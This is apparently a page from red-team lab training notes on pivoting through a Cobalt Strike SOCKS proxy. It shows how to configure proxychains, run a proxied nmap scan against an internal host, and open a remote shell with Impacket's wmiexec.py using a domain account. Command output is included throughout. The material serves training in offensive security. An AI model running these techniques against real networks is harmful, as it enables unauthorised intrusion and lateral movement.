Linux Tools

proxychains is a tool which acts as a wrapper around other applications to tunnel their traffic over a socks proxy. First, we need to modify its configuration file to point to our Cobalt Strike socks proxy.

attacker@ubuntu ~> sudo vim /etc/proxychains.conf

\

At the bottom of the file, you will see a default entry for SOCKS4: socks4 127.0.0.1 9050. We need to change this to match the settings of the proxy we started.

  • SOCKS4: socks4 127.0.0.1 1080.

  • SOCKS5: socks5 127.0.0.1 1080 socks_user socks_password.

To tunnel a tool through proxychains, it's as simple as proxychains [tool] [tool args]. So to tunnel nmap, it would be:

attacker@ubuntu ~> proxychains nmap -n -Pn -sT -p445,3389,4444,5985 10.10.122.10
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2022-09-05 13:31 UTC
|S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:3389-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>>-10.10.122.10:4444-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:5985-<><>>-OK
Nmap scan report for 10.10.122.10
Host is up (0.061s latency).

PORT     STATE  SERVICE
445/tcp  open   microsoft-ds
3389/tcp open   ms-wbt-server
4444/tcp closed krb524
5985/tcp open   wsman

Nmap done: 1 IP address (1 host up) scanned in 15.31 seconds

\

There are some restrictions on the type of traffic that can be tunnelled, so you must make adjustments with your tools as necessary. ICMP and SYN scans cannot be tunnelled, so we must disable ping discovery (-Pn) and specify TCP scans (-sT) for this to work.

You can also run tools from inside WSL on Windows.

ubuntu@DESKTOP-3BSK7NO ~ > proxychains wmiexec.py DEV/jking@10.10.122.30
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
|S-chain|-<>-10.10.5.50:1080-<><>-10.10.122.30:445-<><>-OK
[*] SMBv3.0 dialect used
|S-chain|-<>-10.10.5.50:1080-<><>-10.10.122.30:135-<><>-OK
|S-chain|-<>-10.10.5.50:1080-<><>-10.10.122.30:49667-<><>-OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
dev\jking

C:\>hostname
web
PreviousSOCKS ProxiesNextWindows Tools

Last updated